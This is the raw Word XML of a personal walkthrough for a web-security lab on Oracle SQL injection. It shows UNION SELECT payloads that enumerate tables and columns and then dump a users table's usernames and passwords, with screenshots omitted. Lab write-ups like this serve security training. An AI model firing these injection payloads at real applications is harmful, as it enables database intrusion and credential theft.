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BC86" w14:textId="77777777" w:rsidR="00A30ACD" w:rsidRDefault="00A30ACD" w:rsidP="00A30ACD">
      <w:r>
        <w:t xml:space="preserve">To Access the Lab – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386762E8" w14:textId="2649E491" w:rsidR="00A30ACD" w:rsidRDefault="009C017B" w:rsidP="00A30ACD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BD25DCC" wp14:editId="7AE7FE6A">
            <wp:extent cx="5731510" cy="3341370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="46274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0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631C" w14:textId="77777777" w:rsidR="00A30ACD" w:rsidRDefault="00A30ACD" w:rsidP="00A30ACD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intercept the request on Burp and send to repeater,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC1F96B" w14:textId="77777777" w:rsidR="00A30ACD" w:rsidRDefault="00A30ACD" w:rsidP="00A30ACD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">On repeater, URL – We can use the SQLi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 xml:space="preserve"> to d</w:t>
      </w:r>
      <w:r w:rsidRPr="00D74838">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etermine the number of columns that are being returned by the query and which columns contain text data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C05C67" w14:textId="77777777" w:rsidR="00A50227" w:rsidRDefault="00A50227"/>
    <w:p w14:paraId="3AF8A0E6" w14:textId="77777777" w:rsidR="005F39B6" w:rsidRDefault="005F39B6"/>
    <w:p w14:paraId="399184EE" w14:textId="77777777" w:rsidR="005F39B6" w:rsidRDefault="005F39B6"/>
    <w:p w14:paraId="4A5312AF" w14:textId="77777777" w:rsidR="005F39B6" w:rsidRDefault="005F39B6"/>
    <w:p w14:paraId="61508C70" w14:textId="77777777" w:rsidR="005F39B6" w:rsidRDefault="005F39B6"/>
    <w:p w14:paraId="325C26BF" w14:textId="77777777" w:rsidR="005F39B6" w:rsidRDefault="005F39B6"/>
    <w:p w14:paraId="0A70B12E" w14:textId="77777777" w:rsidR="005F39B6" w:rsidRDefault="005F39B6"/>
    <w:p w14:paraId="5057182D" w14:textId="77777777" w:rsidR="005F39B6" w:rsidRDefault="005F39B6"/>
    <w:p w14:paraId="219FE156" w14:textId="77777777" w:rsidR="005F39B6" w:rsidRDefault="005F39B6"/>
    <w:p w14:paraId="12FCD63D" w14:textId="77777777" w:rsidR="005F39B6" w:rsidRDefault="005F39B6"/>
    <w:p w14:paraId="6AF3B1BB" w14:textId="77777777" w:rsidR="005F39B6" w:rsidRDefault="005F39B6"/>
    <w:p w14:paraId="00CC43E2" w14:textId="77777777" w:rsidR="005F39B6" w:rsidRDefault="005F39B6"/>
    <w:p w14:paraId="4C7189B6" w14:textId="77777777" w:rsidR="005F39B6" w:rsidRDefault="005F39B6"/>
    <w:p w14:paraId="7A3E2CF8" w14:textId="77777777" w:rsidR="005F39B6" w:rsidRDefault="005F39B6"/>
    <w:p w14:paraId="211CA2EA" w14:textId="77777777" w:rsidR="005F39B6" w:rsidRDefault="005F39B6"/>
    <w:p w14:paraId="15D75381" w14:textId="77777777" w:rsidR="005F39B6" w:rsidRDefault="005F39B6"/>
    <w:p w14:paraId="42804B90" w14:textId="43AFBA3C" w:rsidR="005F39B6" w:rsidRDefault="005F39B6">
      <w:r>
        <w:t>To find the tab</w:t>
      </w:r>
      <w:r w:rsidR="002515EC">
        <w:t>les, use the command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A508BA" w14:textId="77777777" w:rsidR="002515EC" w:rsidRDefault="002515EC"/>
    <w:p w14:paraId="38516E5E" w14:textId="2F0E7457" w:rsidR="002515EC" w:rsidRPr="002515EC" w:rsidRDefault="002515EC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002515EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>‘+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002515EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>union+select+table_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002515EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>name,NULL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002515EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>+FROM_all_tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002515EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F84F53" w14:textId="78686D98" w:rsidR="003A5FDD" w:rsidRDefault="003A5FDD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="594151A9" wp14:editId="037DDA2E">
            <wp:extent cx="5731510" cy="4002405"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="204403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30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0C06" w14:textId="48136200" w:rsidR="003A5FDD" w:rsidRDefault="002515EC">
      <w:r>
        <w:t>Here, we can see an users table called – USERS_GNDPFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A78181" w14:textId="77777777" w:rsidR="002515EC" w:rsidRDefault="002515EC"/>
    <w:p w14:paraId="30EA128B" w14:textId="77777777" w:rsidR="002515EC" w:rsidRDefault="002515EC"/>
    <w:p w14:paraId="190006A7" w14:textId="77777777" w:rsidR="002515EC" w:rsidRDefault="002515EC"/>
    <w:p w14:paraId="32EF2CEE" w14:textId="77777777" w:rsidR="002515EC" w:rsidRDefault="002515EC"/>
    <w:p w14:paraId="1403423E" w14:textId="77777777" w:rsidR="002515EC" w:rsidRDefault="002515EC"/>
    <w:p w14:paraId="14B5EAC4" w14:textId="77777777" w:rsidR="002515EC" w:rsidRDefault="002515EC"/>
    <w:p w14:paraId="6080F40F" w14:textId="77777777" w:rsidR="002515EC" w:rsidRDefault="002515EC"/>
    <w:p w14:paraId="36AA03A5" w14:textId="77777777" w:rsidR="002515EC" w:rsidRDefault="002515EC"/>
    <w:p w14:paraId="377EF607" w14:textId="77777777" w:rsidR="002515EC" w:rsidRDefault="002515EC"/>
    <w:p w14:paraId="57DB524C" w14:textId="77777777" w:rsidR="002515EC" w:rsidRDefault="002515EC"/>
    <w:p w14:paraId="23B1562E" w14:textId="77777777" w:rsidR="002515EC" w:rsidRDefault="002515EC"/>
    <w:p w14:paraId="09FD90AE" w14:textId="48C17114" w:rsidR="002515EC" w:rsidRDefault="002515EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Next to display the username and password, we will use the command - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CD37D5" w14:textId="18077737" w:rsidR="002515EC" w:rsidRDefault="002515EC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/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187807" wp14:editId="717536A5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>603885</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2844165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="43909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993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515EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'+UNION+SELECT+column_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002515EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name,NULL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002515EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+FROM+all_tab_columns+WHERE+table_name%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’USERS_GNDPFI’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5F515F" w14:textId="740251C2" w:rsidR="00433231" w:rsidRDefault="00433231">
      <w:pPr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4FB180BA" wp14:editId="401FF45E">
            <wp:extent cx="5731510" cy="3514725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="18396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3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1704" w14:textId="0A6785EE" w:rsidR="002515EC" w:rsidRDefault="002515EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, we have the username and password. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7BCE2C" w14:textId="77777777" w:rsidR="002515EC" w:rsidRDefault="002515EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42CD9098" w14:textId="77777777" w:rsidR="002515EC" w:rsidRPr="002515EC" w:rsidRDefault="002515EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC1B8D3" w14:textId="77777777" w:rsidR="00433231" w:rsidRDefault="00433231"/>
    <w:p w14:paraId="2E12DF31" w14:textId="77777777" w:rsidR="00433231" w:rsidRDefault="00433231"/>
    <w:p w14:paraId="688293C6" w14:textId="676DE514" w:rsidR="002515EC" w:rsidRDefault="002515EC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Next, to get the administrator username and password, we can use the command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE4A15C" w14:textId="6330F70D" w:rsidR="00433231" w:rsidRPr="002515EC" w:rsidRDefault="00433231">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002515EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Gifts'+union+select+USERNAME_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002515EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>GZMXBW,PASSWORD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002515EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>_QMMTFC+from+USERS_GNDPFI+--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EFC5C6" w14:textId="4A8E7BA5" w:rsidR="00433231" w:rsidRDefault="00433231">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="572A3717" wp14:editId="183681A4">
            <wp:extent cx="5731510" cy="4503420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18879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0B2B" w14:textId="77777777" w:rsidR="00433231" w:rsidRDefault="00433231"/>
    <w:p w14:paraId="18542033" w14:textId="420BBD90" w:rsidR="005F39B6" w:rsidRDefault="005F39B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57742576" wp14:editId="78B7588D">
            <wp:extent cx="5731510" cy="2546350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="176219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1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9B6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5EE3" w14:textId="77777777" w:rsidR="0075063E" w:rsidRDefault="0075063E" w:rsidP="008411E3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="00EC29BE" w14:textId="77777777" w:rsidR="0075063E" w:rsidRDefault="0075063E" w:rsidP="0084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EAF1" w14:textId="77777777" w:rsidR="008411E3" w:rsidRPr="006D5470" w:rsidRDefault="008411E3" w:rsidP="008411E3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5A06954C" w14:textId="3A2FB007" w:rsidR="008411E3" w:rsidRPr="008411E3" w:rsidRDefault="008411E3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C20D" w14:textId="77777777" w:rsidR="0075063E" w:rsidRDefault="0075063E" w:rsidP="008411E3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7EC226DD" w14:textId="77777777" w:rsidR="0075063E" w:rsidRDefault="0075063E" w:rsidP="0084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97147" w14:textId="3FC9C1FD" w:rsidR="008411E3" w:rsidRPr="008411E3" w:rsidRDefault="008411E3" w:rsidP="008411E3">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidRPr="008411E3">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>WebSecurity</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r w:rsidRPr="008411E3">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> lab - SQL injection attack, listing the database contents on Oracle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27"/>
    <w:rsid w:val="001A44C1"/>
    <w:rsid w:val="002515EC"/>
    <w:rsid w:val="003A5FDD"/>
    <w:rsid w:val="00433231"/>
    <w:rsid w:val="005F39B6"/>
    <w:rsid w:val="0075063E"/>
    <w:rsid w:val="008411E3"/>
    <w:rsid w:val="009C017B"/>
    <w:rsid w:val="00A30ACD"/>
    <w:rsid w:val="00A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7BFA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{380D59D1-DDB0-45E0-9B4E-5D566C14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E3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00841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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-29T10:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-31T09:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>